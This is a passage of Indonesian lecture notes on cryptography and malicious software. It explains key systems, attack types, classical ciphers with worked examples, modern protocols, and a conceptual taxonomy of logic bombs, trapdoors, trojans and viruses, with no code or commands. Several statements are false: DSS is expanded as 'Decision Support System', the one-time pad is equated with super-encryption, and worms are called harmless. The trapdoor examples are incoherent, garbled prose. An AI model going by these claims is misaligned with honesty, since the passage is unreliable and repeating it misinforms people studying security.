2. Assymmetric Cryptosystem
Dalam assymmetric cryptosystem ini digunakan dua buah kunci. Satu
kunci yang disebut kunci publik (public key) dapat dipublikasikan, sedang
kunci yang lain yang disebut kunci privat (private key) harus dirahasiakan.
Proses memakai sistem ini dapat diterangkan secara sederhana sebagai
berikut : bila A ingin mengirimkan pesan kepada B, A dapat menyandikan
pesannya dengan memakai kunci publik B, dan bila B ingin membaca
surat ini , ia perlu mendekripsikan surat itu dengan kunci privatnya.
Dengan demikian kedua belah pihak dapat menjamin asal surat serta keaslian
surat ini , sebab adanya mekanisme ini. Contoh sistem ini antara lain
RSA Scheme dan Merkle-Hellman Scheme.
3.5 Protokol Criptosystem
Cryptographic protocol yaitu suatu protokol yang memakai
kriptografi. Protokol ini melibatkan sejumlah algoritma kriptografi, namun
secara umum tujuan protokol lebih dari sekedar kerahasiaan. Pihak-pihak
yang berpartisipasi mungkin saja ingin membagi sebagian rahasianya untuk
menghitung sebuah nilai, menghasilkan urutan random, atau pun
menandatangani kontrak secara bersamaan.
pemakaian kriptografi dalam sebuah protokol terutama ditujukan untuk
mencegah atau pun mendeteksi adanya eavesdropping dan cheating.11
3.6 Jenis Penyerangan Pada Protokol
Jenis – jenis penyerangan pada protocol, yaitu :
a. Ciphertext-only attack. Dalam penyerangan ini, seorang cryptanalyst
memiliki ciphertext dari sejumlah pesan yang seluruhnya telah dienkripsi
memakai algoritma yang sama.
b. Known-plaintext attack. Dalam tipe penyerangan ini, cryptanalyst memiliki
akses tidak hanya ke ciphertext sejumlah pesan, namun ia juga memiliki
plaintext pesan-pesan ini .
c. Chosen-plaintext attack. Pada penyerangan ini, cryptanalyst tidak hanya
memiliki akses atas ciphertext dan plaintext untuk beberapa pesan, tetapi
ia juga dapat memilih plaintext yang dienkripsi.
d. Adaptive-chosen-plaintext attack. Penyerangan tipe ini merupakan suatu
kasus khusus chosen- plaintext attack. Cryptanalyst tidak hanya dapat
memilih plaintext yang dienkripsi, ia pun memiliki kemampuan untuk
memodifikasi pilihan berdasarkan hasil enkripsi sebelumnya. Dalam
chosen- plaintext attack, cryptanalyst mungkin hanya dapat memiliki
plaintext dalam suatu blok besar untuk dienkripsi; dalam adaptive-
chosen-plaintext attack ini ia dapat memilih blok plaintext yang lebih kecil
dan kemudian memilih yang lain berdasarkan hasil yang pertama, proses
ini dapat dilakukannya terus menerus hingga ia dapat memperoleh
seluruh informasi.
e. Chosen-ciphertext attack. Pada tipe ini, cryptanalyst dapat memilih
ciphertext yang berbeda untuk didekripsi dan memiliki akses atas
plaintext yang didekripsi.
f. Chosen-key attack. Cryptanalyst pada tipe penyerangan ini memiliki
pengetahuan tentang hubungan antara kunci-kunci yang berbeda.
g. Rubber-hose cryptanalysis. Pada tipe penyerangan ini, cryptanalyst
mengancam, memeras, atau bahkan memaksa seseorang hingga mereka
memberikan kuncinya.
3.7 Jenis Penyerangan Pada Jalur Komunikasi
Penyerangan pada jalur komunikasi, yaitu :
a. Sniffing: secara harafiah berarti mengendus, tentunya dalam hal ini yang
diendus yaitu pesan (baik yang belum ataupun sudah dienkripsi) dalam
suatu saluran komunikasi. Hal ini umum terjadi pada saluran publik yang
tidak aman. Sang pengendus dapat merekam pembicaraan yang terjadi.
b. Replay attack: Jika seseorang bisa merekam pesan-pesan handshake
(persiapan komunikasi), ia mungkin dapat mengulang pesan-pesan yang
telah direkamnya untuk menipu salah satu pihak.
c. Spoofing: Penyerang – misalnya Maman – bisa menyamar menjadi Anto.
Semua orang dibuat percaya bahwa Maman yaitu Anto. Penyerang
berusaha meyakinkan pihak-pihak lain bahwa tak ada salah dengan
komunikasi yang dilakukan, padahal komunikasi itu dilakukan dengan
sang penipu/penyerang. Contohnya jika orang memasukkan PIN ke
dalam mesin ATM palsu – yang benar-benar dibuat seperti ATM asli –
tentu sang penipu bisa mendapatkan PIN-nya dan copy pita magentik
kartu ATM milik sang nasabah. Pihak bank tidak tahu bahwa telah terjadi
kejahatan.
d. Man-in-the-middle: Jika spoofing terkadang hanya menipu satu pihak,
maka dalam skenario ini, saat Anto hendak berkomunikasi dengan Badu,
Maman di mata Anto seolah-olah yaitu Badu, dan Maman dapat pula
menipu Badu sehingga Maman seolah-olah yaitu Anto. Maman dapat
berkuasa penuh atas jalur komunikas ini, dan bisa membuat berita fitnah.
3.8 Metode Kriptografi
3.8.1 Metode kuno
a. 475 S.M. bangsa Sparta, suatu bangsa militer pada jaman Yunani kuno,
memakai teknik kriptografi yang disebut scytale, untuk kepentingan
perang. Scytale terbuat dari tongkat dengan papyrus yang
mengelilinginya secara spiral. Kunci dari scytale yaitu diameter
tongkat yang digunakan oleh pengirim harus sama dengan diameter
tongkat yang dimiliki oleh penerima pesan, sehingga pesan yang
disembunyikan dalam papyrus dapat dibaca dan dimengerti oleh
penerima.
Gambar 3.1 Scytale
b. Julius Caesar, seorang kaisar terkenal Romawi yang menaklukkan
banyak bangsa di Eropa dan Timur Tengah juga memakai suatu
teknik kriptografi yang sekarang disebut Caesar cipher untuk
berkorespondensi sekitar tahun 60 S.M. Teknik yang digunakan oleh
Sang Caesar yaitu mensubstitusikan alfabet secara beraturan, yaitu
20
oleh alfabet ketiga yang mengikutinya, misalnya, alfabet ‘’A" digantikan
oleh "D", "B" oleh "E", dan seterusnya.
Gambar 3.2 Julius Caesar
3.8.2 Metode Modern
a. Digital Certificate Server (DCS)
1) verifikasi untuk digital signature
2) autentikasi user
3) memakai public dan private key
contoh : Netscape Certificate Server
b. IP Security (IPSec)
1) enkripsi public/private key
2) dirancang oleh CISCO System
3) memakai DES 40-bit dan authentication
4) built-in pada produk CISCO
5) solusi tepat untuk Virtual Private Network (VPN) dan Remote
Network Access
c. Secure Shell (SSH)
1) digunakan untuk client side authentication antara 2 sistem
2) mendukung UNIX, windows, OS/2
3) melindungi telnet dan ftp (file transfer protocol)
d. Secure Socket Layer (SSL)
1) dirancang oleh Netscape
2) menyediakan enkripsi RSA pada layes session dari model OSI.
3) independen terhadap servise yang digunakan.
4) melindungi system secure web e-commerce
5) metode public/private key dan dapat melakukan authentication
6) terintegrasi dalam produk browser dan web server Netscape.
e. Security Token
aplikasi penyimpanan password dan data user di smart card
f. Simple Key Management for Internet Protocol
1) seperti SSL bekerja pada level session model OSI.
2) menghasilkan key yang static, mudah bobol.
g. MD5
1) dirancang oleh Prof. Robert Rivest (RSA, MIT) tahun 1991
2) menghasilkan 128-bit digest.
3) cepat tapi kurang aman
h. Secure Hash Algoritm (SHA)
1) dirancang oleh National Institute of Standard and Technology
(NIST) USA.
2) bagian dari standar DSS(Decision Support System) USA dan
bekerja sama dengan DES untuk digital signature.
3) SHA-1 menyediakan 160-bit message digest
4) Versi : SHA-256, SHA-384, SHA-512 (terintegrasi dengan AES)
i. RSA Encryption
1) dirancang oleh Rivest, Shamir, Adleman tahun 1977
2) standar de facto dalam enkripsi public/private key
3) didukung oleh Microsoft, apple, novell, sun, lotus
4) mendukung proses authentication
5) multi platform
j. Remote Access Dial-in User Service (RADIUS)
1) multiple remote access device memakai 1 database untuk
authentication
2) didukung oleh 3com, CISCO, Ascend
3) tidak memakai encryption
k. Point to point Tunneling Protocol(PPTP), Layer Two Tunneling
Protocol (L2TP)
1) dirancang oleh Microsoft
2) autentication berdasarkan PPP(Point to point protocol)
3) enkripsi berdasarkan algoritm Microsoft (tidak terbuka)
4) terintegrasi dengan NOS Microsoft (NT, 2000, XP)
l. Kerberos
1) solusi untuk user authentication
2) dapat menangani multiple platform/system
3) free charge (open source)
4) IBM menyediakan versi komersial : Global Sign On (GSO)
m. Advanced Encryption Standard (AES)
1) untuk menggantikan DES (launching akhir 2001)
2) memakai variable length block chipper
3) key length : 128-bit, 192-bit, 256-bit
4) dapat diterapkan untuk smart card.11
TEKNIK KRIPTOGRAFI KUNO I
4.1 Teknik Kriptografi Klasik/Kuno I
(idokeren 2018) Kriptografi klasik/kuno merupakan Teknik subtisusi yaitu
penggantian setiap karakter teks asli dengan karakter lainya, salah satu teknik
subtisusi pada kriptografi Klasik/Kuno yaitu kode kaisar, yang beradaptasi
pada pemakaian ‘ Roda Kaisar’.
4.1.1 Monoalphabet
Perhatikan alphabet plaintext dibawah ini
Gambar 4.1 Contoh Monoalphabet
Misal, Jika penggeseran yang dilakukan sebanyak 3 kali maka kunci untuk
deskripsinya yaitu 3. Maka susunan huruf untuk ciphertext yaitu :
Gambar 4.2 Contoh Monoalphabet
Contoh Tentukan chipper text dari plaintext ‘ K R I P T O G R A F I ‘!
Plaintext : K R I P T O G R A F I
Ciphertext : N U L S W R J U D I L
4.1.2 Polyalphabet
Merupakan gagasan baru dalam perkembangan kode kaisar untuk
memakai kunci laian yang di sebut Polyalphabetic. Teknik ini cenderung
memakai kunci berupa huruf dan tidak ada pengunaan huruf yang di
ulang. pemakaian tidak hanya dengan satu kunci tetapi bisa mengunakan
lebih dari satu kunci.
1. Satu kunci
Plaintext : B E L A J A R K R I P T O G R A F I
Kunci : M E R D E K A
Gambar 4.3 Contoh Polyalphabet 1 Kunci
Ciphertext : E K I M G M Q H Q F O T N B Q M A F
2. Dua Kunci
Plaintext : B E L A J A R K R I P T O G R A F I
Kunci 1 : MERDEKA
Kunci 2 : INDONESIA
23
Gambar 4.4 Contoh Polyalphabet 2 Kunci
Ciphertext : EGCJAJP BPSLTKNPJIS
3. Tiga Kunci
Plaintext : CEGAH PEGAWAI KPK
Kunci 1 : MERDEKA
Kunci 2 : INDONESIA
Kunci 3 : PUTIH MERAH
Gambar 4.5 Contoh Polyalphabet 3 Kunci
Ciphertext : LEGBIDEGBWBOUDU
5.1 Teknik Kriptografi Klasik/Kuno II
(Kriptografi 2020) Metode dengan memakai lebih dari satu kunci terdiri
dari 3 bagian yaitu blok, karakter, dan zigzag:
5.1.1 Blok
Membagi jumlah teks-asli menjadi blok-blok yang ditentukan, tergantung dari
keinginan pengirim pesan.
24
Plaintext : PERHATIKAN RAKYAT KECIL
Kunci 1 : M E R D E K A
Kunci 2 : I N D O N E S I A
Kunci 3 : P U T I H M E R A H
Plaintext diatas akan dibagi menjadi 6 blok dengan masing-masing karakter
terdiri dari 4 karakter. sebab blok yang keenam tidak mencukupi maka
ditambahkan dengan karakter‘X’ atau karakter lain yang ditentukan.
Gambar 5.1 Contoh Plaintext 6 Blok
Gambar 5.2 Contoh Metode Blok Kunci 1,2,3
Maka ciphertext yang dihasilkan :
OKQCITCGPGNPHYMTGEDCDXXX
Gambar 5.3 Hasil Ciphertext dari Metode Blok
5.1.2 Karakter
Metode ini yaitu memakai pendistribusian perkarakter. Perhatikan
contoh dibawah ini:
Plaintext : PERHATIKAN RAKYAT KECIL
K1 : M E R D E K A
K2 : I N D O N E S I A
K3 : P U T I H M E R A H
Metode : Karakter
Gambar 5.4 Contoh Kunci(k)1,2,3 Metode Karakter
Maka cara menentukan ciphertextnya sebagai berikut:
Gambar 5.5 Hasil Ciphertext Metode Karakter
Ciphertext : OENCIQFGPLQPHYPTGHRCD
5.1.3 Zigzag
Metode ini dengan menentukan ciphertext dari plaintext pada kunci 1 (K1)
kemudian mencari huruf yang sama hasil dari ciphertext K1 ke chipertext K2
dan mengambil plaintext dari ciphertext K2 untuk selanjutnya mencari huruf
yang sama, hasil dari plaintext K2 dengan huruf ciphertext pada K3 dan
plaintext pada ciphertext K3 ini yang diambil menjadi ciphertext akhir.
Perhatikan contoh dibawah ini:
Plaintext : PERHATIKAN RAKYAT KECIL
K1 : M E R D E K A
K2 : I N D O N E S I A
K3 : P U T I H M E R A H
Metode : Zigzag
Gambar 5.6 Contoh Kriptografi Metode Zigzag
Ciphertext : LRHDACOQASHAQYACQRUOI
5.1.4 Kode Geser
Ada metode lain selain memakai kode geser yang diterapkan kode kaisar
mono-alphabet, yaitu dengan memakai kode kunci berupa angka bukan
banyaknya pergeseran.
Gambar 5.7 Contoh Kriptografi Metode Kode Geser
Perhatikan contoh dibawah ini:
Plaintext : PERHATIKAN RAKYAT KECIL
Kalimat diatas jika diubah menjadi angka sebagai berikut:
Gambar 5.8 Contoh Metode Kode Geser ke Angka
Kode Kunci : 11
Caranya dengan menambahkan masing-masing angka plaintext dengan kode
kunci 11, maka didapatkan:
Gambar 5.9 Hasil kriptografi metode kode geser
Catatan jika ketika dijumlahkan hasilnya lebih dari 26, maka akan dikurangi
26. Misalnya: 24 + 11 = 35 – 26 = 9. Selanjutnya hasil penjumlahan dikonversi
menjadi huruf sesuai dengan nilai standar setiap huruf.
Ciphertext : APCSLETVLYCLVJLEVPNTW
5.2 Teknik Kriptografi Klasik/Kuno III
5.2.1 Kode Vigenere
(idokeren 2018) Merupakan kode abjad-majemuk. Teknik dari subtitusi
vigenere bisa dilakukan dengan 2 cara yaitu angka dan huruf.Teknik ini cukup
mudah dipahami dan di aplikasikan.teknik ini di kenalkan oleh seorang
kriptologis berkebangsaan perancis Blaise De Vigenere pada abad 16 ( 1586
), dan teknik ini baru terkenal 200 tahun setelahnya yang kemudian dikenal
dengan Code Vigenere.
Kode vigener yang di gunakan oleh tentara konfederasi ( Confederate
Army ) pada perang sipil amerika ( American civil War ). Kode vigenere
berhasil di enkripsi oleh Babbage dan Kasiski pada abad 19 pertengahan. 12
1. Angka
Teknik ini hampir sama dengan kode geser, hanya saja pada vigenere angka
caranya dilakukan dengan menukarkan huruf dengan angka dan
memakai kode kunci berupa kumpulan angka yang sudah ditentukan.
Gambar 5.10 Contoh Kode Vigenere (Angka)
Perhatikan contoh dibawah ini:
Plaintext : PERHATIKAN RAKYAT KECIL
Kunci : (2, 8, 7, 15, 4)
Gambar 5.11 Hasil Kriptografi Kode Vigener (Angka)
2. Huruf
Pada teknik huruf memakai tabula recta ( bujur sangkar vigenere)
dengan pola dibawah ini:
Gambar 5.12 Contoh Polatabula Recta
Contoh :
Plaintext : PERHATIKAN RAKYAT KECIL
Kunci : I N D O N E S I A
Maka cara menentukan chipertext-nya yaitu :
Gambar 5.13 Hasil Kriptografi Kode Vigener (Huruf)
Ciphertext : XRUVNXASAVEDYLELSEKVO
5.2.2 Kode Playfair
Ditemukan oleh Sir Charles Wheatstone dan Baron Lyon Playfair pada
tahun 1854. Cipher ini mengenkripsi pasangan huruf (digram atau digraf),
bukan huruf tunggal seperti pada cipher klasik lainnya. Tujuannya yaitu
untuk membuat analisis frekuensi menjadi sangat sulit sebab frekuensi
kemunculan huruf-huruf di dalam cipherteks menjadi datar (flat).
Kunci kriptografinya 25 buah huruf yang disusun di dalam bujursangkat 5x5
dengan menghilangkan huruf J dari abjad.13
Dan matriks yang digunakan yaitu :
Gambar 5.14 Tabel Matriks Bujusangkar Kode Playfair
Ada beberapa aturan dalam melakukan enkripsi dengan kode playfair yaitu:
1. Karakter yang ada pada plaintext dibagi menjadi masing-masing 2
karakter.
2. Jika kedua huruf/ karakter tidak terletak pada satu baris atau kolom maka
pergerakan karakter dimulai dari huruf kedua secara vertical menuju teks-
kode. Contoh: karakter ‘di’ terdapat pada baris dan kolom yang berbeda
maka dimulai dari ‘I’ tarik secara vertikal menuju baris yang terdapat huruf
‘d’ sebanyak 2 baris maka akan ditemukan ‘n’, selanjutnya ‘d’ ditarik
vertical menuju baris yang terdapat ‘I’ sehingga didapatkan ‘L’.
Gambar 5.15 Tabel Matriks Bujusangkar Kode Playfair
3. Jika karakter-karakter yang dienkripsi atau deskripsi berada pada kolom
atau baris yang sama dan saling berdekatan maka gunakan prinsip
kebawah atau kesamping. Contoh karakter ‘an’, maka karakter disamping
‘n’ yaitu ‘d’ dan karakter disamping ‘a’ yaitu ‘n’ maka ciphertextnya
yaitu ‘dn’.
Gambar 5.16 Tabel Matriks Bujusangkar Kode Playfair
4. Jika karakter yang dienkripsi berada pada akhir baris maka diikuti aturan
no 3 diatas, tetapi pada kasus baris terakhir maka karakter yang diambil
yaitu karakter yang disamping yaitu karakter pertama pada baris
selanjutnya.
Gambar 5.17 Tabel Matriks Bujusangkar Kode Playfair
5. Jika terdapat karakter kembar maka cukup ditambahkan karakter yang
disepakati misalnya karakter ‘aa’ disepakati untuk disisipkan dengan
karakter ‘z’ maka chipertext ‘aza’.
6. Untuk kepentingan analisis kode playfair maka aturan no 2 disebut ERDL
(Encipher Right Decihper Left), aturan no 3 dan 4 disebut EBDA
(Encipher Below Decipher Above).
Contoh: Belajarlah Cepat
Gambar 5.18 Tabel Matriks Bujusangkar Kode Playfair
sebab pada akhir tidak terdapat 2 karakter maka untuk melengkapi di
tambahkan karakter yang disepakati.
TEKNIK TRANSPOSISI DAN ONE TIME PAD
6.1 Teknik Kriptografi Transposisi dan One Time Pad
Kriptografi yaitu ilmu mengenai teknik enkripsi dimana “naskah asli”
(plaintext) diacak memakai suatu kunci enkripsi menjadi “naskah acak
yang sulit dibaca” (ciphertext) oleh seseorang yang tidak memiliki kunci
dekripsi. Dekripsi memakai kunci dekripsi bisa mendapatkan kembali
data asli. Probabilitas mendapat kembali naskah asli oleh seseorang yang
tidak mempunyai kunci dekripsi dalam waktu yang tidak terlalu lama yaitu
sangat kecil.
Teknik enkripsi yang digunakan dalam kriptografi klasik yaitu enkripsi
simetris dimana kunci dekripsi sama dengan kunci enkripsi. Untuk public key
cryptography, diperlukan teknik enkripsi asimetris dimana kunci dekripsi tidak
sama dengan kunci enkripsi. Enkripsi, dekripsi dan pembuatan kunci untuk
teknik enkripsi asimetris memerlukan komputasi yang lebih intensif
dibandingkan enkripsi simetris, sebab enkripsi asimetris memakai
bilangan – bilangan yang sangat besar.
6.1.1 Teknik Transposisi
Metode penyandian transposisi yaitu metode penyandian dengan cara
mengubah letak dari teks pesan yang akan disandikan. Untuk membaca
pesan aslinya kembali, cukup dengan mengembalikan letak dari pesan
ini berdasarkan kunci dan algoritma pergeseran huruf yang telah
disepakati.
Sebelumnya sudah dijelaskan bahwa metode kuno/ klasik terdiri dari 2 teknik
yaitu:
1. Teknik Subtitusi, contoh: kode kaisar (geser, monoalphabet,
polyalphabet, playfair, dan lainnya)
2. Teknik Permutasi, contoh: kode transposisi.
Teknik ini memakai permutasi karakter, yang mana dengan
memakai teknik ini pesan asli tidak dapat dibaca kecuali oleh orang yang
memiliki kunci untuk mengembalikan pesan ini ke bentuk semula.
Sebagai contoh, ada 6 kunci untuk melakukan permutasi kode:
Gambar 6.1 Kunci Permutasian Kode
Dan 6 kunci untuk inversi dari permutasi ini :
Gambar 6.2 Kunci Inversi dari Permutasian Kode
Terlebih dahulu plaintext dibagi menjadi beberapa blok dan tiap blok nya terdiri
dari 6 karakter, jika terjadi kekurang pada setiap blok maka disisipkan karakter
yang disepakati sebelumnya.
Perhatikan contoh dibawah ini:
Plaintext : PERHATIKAN RAKYAT KECIL
Cara memutasi plaintext, yaitu :
Gambar 6.3 Hasil Teknik Transposisi permutasian kode
Ciphertext : RAPTHEARIANKAKKETYLXCXXI
Sedangkan kunci inverse berfungsi untuk mengubah ciphertext menjadi
plaintext.
Perhatikan contoh dibawah ini:
Gambar 6.4 Hasil Plaintext Transposisi Permutasian
Selain teknik mutasi-inversi ada beberapa teknik permutasi lainnya yaitu
dengan memakai permutasi zigzag, segitiga, spiral, dan diagonal.
1. Zig-zag Dengan memasukan plaintext seperti pola zig-zag.
Plaintext: PERHATIKAN RAKYAT KECIL
Gambar 6.5 Contoh Teknik Permutasian Pola Zigzag
Ciphertext : HNTXRAARAKLETKAYEIPIKC
2. Segitiga Dengan memasukan plaintext sepeti pola segitiga.
Plaintext: PERHATIKAN RAKYAT KECIL
Gambar 6.6. Contoh Teknik Permutasian Pola Segitiga
Ciphertext : KNEARCETAIPRIKLHKYXAAXTXX
3. Spiral Dengan memasukan plaintext disusun seperti pola spiral.
Plaintext: PERHATIKAN RAKYAT KECIL
Gambar 6.7 Contoh Teknik Permutasian Pola Sprial 1
Ciphertextnya : PTAYKEKXXAREXXRHCILNATIKA
4. Diagonal Dengan memasukan plaintext disusun seperti pola dibawah ini.
Plaintext: PERHARTIKAN RAKYAT KECIL
Gambar 6.8 Contoh Teknik Permutasian Pola Spiral 2
Ciphertextnya : PTRTLEIAKXRKKEXHAYCXANAIX
6.1.2 One Time Pad
Pada umumnya algoritma kriptografi tidaklah sempurna, tetapi untuk
mendapatkan algoritma yang lebih baik dan mempunyai sedikit kemunngkinan
untuk dipecahkan yaitu one time pad (OTP). Salah satu konsep OTP yaitu
dengan memakai enkripsi super. Contoh pada metode ini yaitu :
Plaintext : PERHATIKAN RAKYAT KECIL
1. memakai teknik subtitusi dengan algoritma kode geser sebanyak 7.
Gambar 6.9 Teknik One Time Pad geser 7
Ciphertext dari hasil teknik subtitusi di ubah menjadi ciphertext dengan teknik
transposisi.
2. memakai teknik transposisi dengan teknik diagonal dengan kunci 5 x
5.
Gambar 6.10 Teknik One Time Pad diagonal 5x5
Ciphertext : VZXZRKOGQXXQQKXNGEIXGTGOX.
Teknik dari enkripsi super sangat penting dan banyak dari algoritma enkripsi
modern yang memakai teknik ini sebagai dasar pembuatan suatu
algoritma modern.
KEAMANAN DARI DEVIL PROGRAM
7.1 Keamanan Devil Program
Devil Program yaitu Program ada yang memerlukan inang (host program)
dan ada yang tidak memerlukan program inang.
Klasifikasi program jahat (Malicious Program)
1. Program-program yang memerlukan program inang (host program).
Fragmen program tidak dapat mandiri secara independen dari suatu
program aplikasi, program utilitas atau program sistem.
2. Program-program yang tidak memerlukan program inang. Program
sendiri yang dapat dijadwalkan dan dijalankan oleh sistem operasi.
7.2 Tipe Tipe Program Jahat
7.2.1. Bacteria
program yang mengkonsumsi sumber daya sistem dengan mereplikasi
dirinya sendiri. Bacteria tidak secara eksplisit merusak file. Tujuan program ini
hanya satu yaitu mereplikasi dirinya. Program bacteria yang sederhana bisa
hanya mengeksekusi dua kopian dirinya secara simultan pada sistem
multiprogramming atau menciptakan dua file baru, masing-masing yaitu
kopian file program bacteria. Kedua kopian in kemudian mengkopi dua kali,
danseterusnya.
7.2.2. Logic Bomb
Dalam program komputer, logic bomb, juga disebut slag code, yaitu kode
pemrograman, yang dimasukkan secara diam-diam atau sengaja, yang
dirancang untuk di eksekusi (atau “meledak”). Sama halnya seperti bom yang
memiliki selang waktu tertentu, atau kegagalan pengguna untuk menanggapi
perintah program, ini virus komputer yang bisa berbentuk Trojan
horse atau malware ransomware.
logik yang ditempelkan pada program komputer agar memeriksa suatu
kumpulan kondisi di sistem. Ketika kondisi-kondisi yang dimaksud ditemui,
logik mengeksekusi suatu fungsi yang menghasilkan aksi-aksi takdiotorisasi.
a. Logic bomb menempel pada suatu program resmi yang diset meledak
ketika kondisi- kondisi tertentudipenuhi.
b. Contoh kondisi-kondisi untuk memicu logic bomb yaitu ada atau tudak
adanya file-file tertentu, hari tertentu daru minggu atau tanggal, atau
pemakai menjalankan aplikasi tertentu. Begitu terpicu, bomb mengubah
atau menghapus data atau seluruh file, menyebabkan mesin terhenti,
atau mengerjakan perusakanlain.
7.2.3. Trapdoor
Trapdoor yaitu jebakan yang digunakan untuk menjebak administrator
agar menjalankan perintah tertentu yang nantinya dengan perintah ini
penyusup bisa mendapatkan jalan untuk mendapatkan previlege
root. Trapdoor yaitu kode yang menerima suatu barisan masukan khusus
atau dipicu dengan menjalankan ID pemakai tertentu atau barisan kejahatan
tertentu. Trapdoor telah dipakai secara benar selama bertahun-tahun oleh
pemogram untuk mencari kesalahan program. Debugging dan testing
biasanya dilakukan pemogram saat mengembangkan aplikasi.
Cara Kerja Trapdoor
Sistem login trapdoor mungkin mengambil bentuk kombinasi pengguna dan
kata sandi keras yang memberikan akses ke sistem.
Contoh:
1. Semacam trap digunakan sebagai perangkat plot / versi browser baru
untuk menekan kelaparan sebab beban kerja di browser.
2. Mode simulasi permainan video dan interaksi langsung dengan
kecerdasan buatan
3. Meskipun jumlah trapdoor dalam sistem yang memakai perangkat
lunak (perangkat lunak yang kode sumbernya tidak tersedia untuk umum)
tidak secara luas dikreditkan, namun sering terinfeksi. Programmer
bahkan berhasil secara diam-diam memasang kode jinak dalam jumlah
besar sebagai hadiah dalam program, meskipun kasus semacam itu
mungkin melibatkan instansi resmi, jika bukan izin sebenarnya.
4. Permintaan Apps / Games di facebook digunakan untuk meminta Anda
MENGIZINKAN aplikasi untuk mengakses informasi Anda untuk diproses
lebih lanjut, sebagian besar orang hanya MENGIZINKAN Aplikasi /
Permintaan untuk mengakses informasi di sana.
7.2.4. Trojan Horse
Istilah ini pertama kali muncul pada sebuah laporan Angkatan Udara AS,
yang menganalisis kerentanan komputer pada tahun 1974. Di tahun 1983,
frasa ini semakin meluas setelah Ken Thompson memakai nya
dalam ceramah Turing yang terkenal, yang mana dia menyatakan:
“Sampai sejauh mana seseorang harus mempercayai pernyataan bahwa
suatu program terbebas dari Trojan? Yang mungkin lebih penting dipercaya:
orang-orang yang menulis perangkat lunaknya.”
Selama kurun waktu 1980-an, the Bulletin Board System—yang
memungkinkan pengguna menembus web melalui saluran telepon—
mengakibatkan peningkatan malware Trojan. Ketika komputer sudah dibekali
kemampuan untuk mengunggah, mengunduh, dan berbagi file, add-on
berbahaya disisipkan ke sistem operasi. Hari ini, terdapat ribuan versi
malware.
Rutin tak terdokumentasi rahasia ditempelkan dalam satu program berguna.
Program yang berguna mengandung kode tersembunyi yang ketika dijalankan
melakukan suatu fungsi yang tak diinginkan. Eksekusi program menyebabkan
eksekusi rutin rahasia ini.
1. Program-program trojan horse digunakan untuk melakukan fungsi-fungsi
secara tidak langsung dimana pemakai tak diotorisasi tidak dapat
melakukannya secara langsung. Contoh, untuk dapat mengakses file-file
pemakai lain pada sistem dipakai bersama, pemakai dapat menciptakan
program trojan horse.
2. Trojan horse ini ketika program dieksekusi akan mengubah ijin-ijin file
sehinga file-file dapat dibaca oleh sembarang pemakai. Pencipta program
dapat menyebarkan ke pemakai- pemakai dengan menempatkan
program di direktori bersama dan menamai programnya sedemikian rupa
sehingga disangka sebagai program utilitas yang berguna.
3. Program trojan horse yang sulit dideteksi yaitu kompilator yang
dimodifikasi sehingga menyisipkan kode tambahan ke program-program
tertentu begitu dikompilasi, seperti program login. Kode menciptakan
trapdoor pada program login yang mengijinkan pencipta log ke sistem
memakai password khusus. Trojan horse jenis ini tak pernah dapat
ditemukan jika hanya membaca program sumber. Motivasi lain dari trojan
horse yaitu penghancuran data. Program muncul sebagai melakukan
fungsi-fungsi berguna (seperti kalkulator), tapi juga secara diam-diam
menghapus file-file pemakai.
4. Trojan horse biasa ditempelkan pada program-program atau rutin-rutin
yang diambil dari BBS, internet, dan sebagainya.
Jenis Trojan Horse
1. Rootkit
Rootkit bekerja dengan menyembunyikan aktivitas tertentu pada sistem
komputer. Rootkit memungkinkan malware berjalan tanpa terdeteksi,
untuk meningkatkan lamanya waktu dan tingkat kerusakan yang dapat
diciptakan dari satu kali infeksi.
2. Backdoor
Trojan backdoor memberikan kendali jarak jauh secara penuh kepada
pemilik, sehingga dia dapat mengedit, mengirim, mengunduh dan
menghapus file. Trojan jenis ini sering digunakan untuk membajak
perangkat pribadi demi kegiatan kriminal.
3. Exploit
Exploit bekerja dengan memanfaatkan lubang keamanan dalam
perangkat lunak. Baik dalam aplikasi tertentu atau memengaruhi sistem
operasinya sendiri, exploit dapat memanipulasi kerentanan untuk
mendapatkan akses langsung ke file Anda.
4. DDoS
Singkatan dari “Distributed Denial of Service,” Trojan ini akan meminta
komputer untuk mengirim permintaan yang tak terhitung jumlahnya ke
URL tertentu, dengan tujuan membebani server dan mematikan situs.
5. Spyware
Spyware bertujuan untuk mencegat informasi pribadi Anda. Untuk
mencapai tujuan ini, spyware menyalin file atau memakai layar atau
keylogger untuk merekam apa yang Anda ketik dan situs web mana yang
Anda kunjungi.
6. Ransomware
Serangan ransomware sering dilakukan dengan memakai Trojan.
Setelah malware masuk ke komputer Anda, komputer itu mengunci Anda
dari area tertentu. Satu-satunya cara untuk mendapatkan kembali akses
yaitu dengan membayar denda.
7.2.5. Virus
Virus yaitu Kode yang ditempelkan dalam satu program yang
menyebabkan pengkopian dirinya disisipkan ke satu program lain atau lebih,
dengan cara memodifikasi program-program itu.
Jenis Jenis Virus
1. Trojan
Trojan yaitu virus yang dibuat dengan tujuan untuk mencuri data serta
mengkontrol data korban. Virus ini masuk kedalam komputer lewat
internet, email, dan lain – lain.
2. Worm
Worm dikategorikan sebagai virus yang tidak membahayakan, namun
mengganggu. Pasalnya, jika komputer terjangkit virus worm dibiarkan
terlalu lama, worm akan menggandakan dirinya sendiri dan membuat
space pada harddisk pengguna penuh.
3. Memory Resident
Biasa akan menyerang RAM. Komputer yang terjangkit virus ini biasanya
sering mengalami perlambatan pada program ketika dijalankan.
4. Companion Virus
Merupakan virus yang cukup sulit untuk di Track. Virus ini cukup
mengganggu sebab dapat mengubah format dari file kita. Hal ini
membuat file kita tidak dapat dibuka atau bahkan sulit ditemukan
5. FAT Virus
File Allocation Table Virus yaitu virus yang cukup berbahaya, sebab
memiliki kemampuan untuk menghancurkan file kita. Selain
menghancurkan, bisa saja virus ini menyembunyikan file – file kita,
sehingga seakan akan hilang atau terhapus.
7.2.5.1 Siklus Hidup Virus
Siklus hidup virus melalui empat fase(tahap), Yaitu :
1. Fase tidur (dormant phase). Virus dalam keadaan menganggur. Virus
akan tiba-tiba aktif oleh suatu kejadian seperti tibanya tanggal tertentu,
kehadiran program atau file tertentu, atau kapasitas disk yang melewati
batas. Tidak semua virus mempunyai tahap ini.
2. Fase propagasi (propagation phase). Virus menempatkan kopian dirinya
ke program lain atau daerah sistem tertentu di disk. Program yang
terinfeksi virus akan mempunyai kloning virus. Kloning virus itu dapat
kembali memasuki fase propagasi.
3. Fase pemicuan (triggering phase). Virus diaktifkan untuk melakukan
fungsi tertentu. Seperti pada fase tidur, fase pemicuan dapat
disebabkan beragam kejadian sistem termasuk penghitungan jumlah
kopian dirinya.
